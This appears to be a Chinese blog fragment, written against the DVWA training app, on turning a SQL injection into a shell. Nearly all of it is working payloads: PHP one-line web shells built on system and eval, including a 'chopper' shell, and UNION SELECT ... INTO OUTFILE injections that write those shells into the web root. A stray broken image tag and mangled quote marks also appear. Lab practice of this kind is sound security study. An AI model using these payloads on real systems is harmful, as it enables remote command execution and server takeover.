標籤:sql
思路:上傳一個“後門”,通過控制後門來得到shell,比如一句話木馬。比如:
<?system($_REQUEST[‘cmd‘]);?> //通過request提交,執行shell<[email protected]($_POST[‘chopper‘]);?>
//PHP一句話木馬,直接上菜刀
這裡構造如下語句:
1‘and 1=2 union select "<?",system($_REQUEST[‘cmd‘]);?>"
into outfile "d:\\xampp\\htdocs\\dvwa\\yy.php"#
1‘ and 1=2 union select 1,"<?system($_REQUEST[‘cmd‘]);?>" into outfile "f:\\xampp\\htdocs\\dvwa\\zzz.php"--
650) this.width=650;" src="http://s4.51cto.com/wyfs02/M02/86/CF/wKiom1fLzO6w2AbHAAIURuE1dG4326.jpg-wh_500x0-wm_3-wmp_4-s_1679569698.jpg" title="cmd.jpg" alt="wKiom1fLzO6w2AbHAAIURuE1dG4326.jpg-wh_50" />
1‘ and 1=2 union select "<?","system($_REQUEST[‘cmd‘]);?>" into outfile "d:\\
xampp\\htdocs\\dvwa\\zzz.php"
<?php eval($_POST[‘888‘]);?>
1‘ and 1=2 union select 1,"<?php eval($_POST[‘888‘]);?>" into outfile "d:\\xampp\\htdocs\\dvwa\\yyy.php"#
SQL inject 漏洞手工利用過程詳解:get shell